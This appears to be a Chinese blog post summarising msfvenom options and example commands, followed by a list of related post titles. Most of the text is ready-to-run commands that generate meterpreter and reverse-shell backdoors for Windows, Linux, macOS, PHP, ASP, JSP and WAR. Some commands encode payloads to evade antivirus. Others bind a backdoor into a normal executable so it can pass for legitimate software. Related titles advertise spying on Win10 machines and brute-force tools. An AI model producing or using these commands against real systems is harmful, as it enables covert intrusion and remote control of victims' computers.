kali php调试,Msfconsole使用总结
MSFVENOM常规选项
1.–p (- -payload-options)
添加载荷payload。
载荷这个东西比较多,这个软件就是根据对应的载荷payload生成对应平台下的后门,所以只有选对payload,再填写正确自己的IP,PORT就可以生成对应语言,对应平台的后门了!!!
(- -payload-options 列出payload选项)
2 –l
查看所有payload encoder nops。
3.–f (- -help-formats)
输出文件格式。
(- -help-formats 列出所有文件格式)
Executable formats:asp, aspx, aspx-exe, axis2, dll, elf, elf-so, exe, exe-only, exe-service, exe-small, hta-psh, jar, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-net, psh-reflection, psh-cmd, vba, vba-exe, vba-psh, vbs, war
Transform formats:, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript
4.–e
编码免杀。
5.–a (- -platform – -help-platforms)
选择架构平台
x86 | x64 | x86_64
Platforms:windows, netware, android, java, ruby, linux, cisco, solaris, osx, bsd, openbsd, bsdi, netbsd, freebsd, aix, hpux, irix, unix, php, javascript, python, nodejs, firefox, mainframe
6. –o
文件输出。
7.–s
生成payload的最大长度,就是文件大小。
8.–b
避免使用的字符 例如:不使用 ‘0f’。
9.–i
编码次数。
10.–c
添加自己的shellcode。
11. –x | -k
捆绑。例如:原先有个正常文件normal.exe 可以通过这个选项把后门捆绑到这个程序上面。
MSFVENOM实例
12.普通生成msfvenom -p -f -o
msfvenom –p windows/meterpreter/reverse_tcp –f exe –o C:\back.exe
13.编码处理型msfvenom -p -e -i -n -f -o
msfvenom -p windows/meterpreter/reverse_tcp –i 3 –e x86/shikata_ga_nai –f exe –o C:\back.exe
14.捆绑Msfvenom –p windows/meterpreter/reverse_tcp –platform windows –a x86 –x C:\nomal.exe –k –f exe –o C:\shell.exe
15.WindowsMsfvenom –platform windows –a x86 –p windows/meterpreter/reverse_tcp –i 3 –e x86/shikata_ga_nai –f exe –o C:\back.exe
Msfvenom –platform windows –a x86 –p windows/x64/meterpreter/reverse_tcp –f exe –o C:\back.exe
16.Linuxmsfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf
17.MACmsfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho
18.PHPmsfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php
19.Aspmsfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp
20.Aspxmsfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f aspx > shell.aspx
21.JSPmsfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp
22.Warmsfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war
版权属于:逍遥子大表哥
按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
kali php调试,Msfconsole使用总结相关推荐
- KALI 2022.2 msfconsole 无法启动
报错 从官网安装 Kali Linux 更新并重新启动后msfconsole 报错 sudo apt update && sudo apt dist-upgrade -y 错误信息: ...
- 用kali的Meterpreter控制win10,可以偷看你的电脑的所有数据
Meterpreter Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道.使用它作为攻击载荷能够获得目 ...
- kali利用msf工具对ms08-067漏洞入侵靶机(win xp2)
kali利用msf工具对ms08-067漏洞入侵靶机(win xp2) 漏洞简介 MS08-067漏洞将会影响Windows 2000/XP/Server 2003/Vista/Server 2008 ...
- 渗透测试-Kali入侵Win7主机
前言 严正声明:本文仅限于技术讨论与分享,严禁用于非法途径. 本文目的:演示如何借助Kali Linux系统的Metasploit渗透测试框架生成远程控制木马,然后感染局域网内的 Win 7主机,从而 ...
- kali使用mysql注入攻击_基于kali实现的一些攻击
本文如果出现什么错误,或者有什么建议欢迎随时联系我,谢谢! 1.局域网断网攻击-----ARP攻击(使用kali下的arpspoof工具,为了方便,受害主机为本人主机) (1)Windows下查询本机 ...
- 2018-2019-2 《网络对抗技术》Exp2 后门原理与应用 20165211
目录 后门原理与应用 实验内容 基础问题回答 常用后门工具 Netcat Socat MSFmeterpreter 实践过程记录 1.后门工具熟悉 2.使用netcat获取主机操作Shell,cron ...
- metasploit msfvenom与veil绕过杀毒软件
这次的实验令我非常兴奋,因为要对抗的是各大杀毒软件厂商,所以事先得做好很多功课.另一方面我也想看看metasploit在这场猫鼠游戏中能不能走在安全厂商的前面. 这次的目标免杀平台是64位window ...
- Metasploit(MSF)基础超级详细版
MSF基础学习看这一篇就够了 Metasploit 常见名词解释 MSF简介 MSF框架结构 MSF配置数据库 内网主机发现 MSF命令查询 常用命令 数据库管理命令 核心命令 模块命令 进程命令 资 ...
- 暴力破解攻击工具汇总——字典很关键,肉鸡也关键
lasercrack是一款爆力破解工具,ruby写的,现如今市面上常见的暴力工具如hydra,medusa都有着不错的破解效率. 破解RDP的软件也有很多,比如ncrack和Fast RDP Brut ...
- linux暴力破解工具
对于 Linux 操作系统来说,一般通过 VNC.Teamviewer 和 SSH 等工具来进行远程管理,SSH 是 Secure Shell 的缩写,由 IETF 的网络小组(Network Wor ...
最新文章
- 查询无法解析索引的几种情况
- 学习笔记:ORACLE 性能优化求生指南
- html5中的一些标签学习总结
- java in thread main_JAVA报错:Exception in thread main……求帮助?
- python入门练习题3(函数)
- Java集合存放有序不重复的对象
- Java扫码登录原理
- IT帮2019年2月线下活动【定义工作,解读自我】之站桩练习
- 目标检测之Faster RCNN分析
- MS PROJECT 下载
- 小程序创业会有哪些坑
- TcaplusDB君 · 行业新闻汇编(12月25号)
- 什么是bug?如何描述一个bug?
- ARM处理器的 Handler mode 与 Thread mode 以及 MSP 和 PSP
- 年会也能互联网+ 易信企业版玩投票抽奖
- Python数据分析之pandas(保姆级教程)
- FreeRTOS-ARM架构深入理解
- 集合石总显示服务器连线中,魔兽世界集合石地下城挑战活动火热开启
- nodejs死亡笔记之CentOS7虚拟机的安装配置及nodejs的安装(面向Windows编程)
- win10中最常用快捷键大全
热门文章
- Windows下安装dilb解决方法
- 远程医疗作用_是远程医疗保健的未来
- Microsoft Teams 当前页面脚本发生错误/例外被抛出且未被接住
- Servlet常用依赖
- Oracle 中 varchar2 和 mysql 中 varchar到底能存多少个汉字?
- oracle 11g varchar/varchar2
- 高数(数一)知识点自我归纳(思维导图)
- 两台电脑怎么互传文件?用它就能搞定!
- ”win7开机提示由于系统注册表文件丢失或损坏因此无法加载”+制作U盘启动盘+笔记本设置U盘启动
- (web前端每日一练)用JS制作一个能够在桌面运行的倒计时插件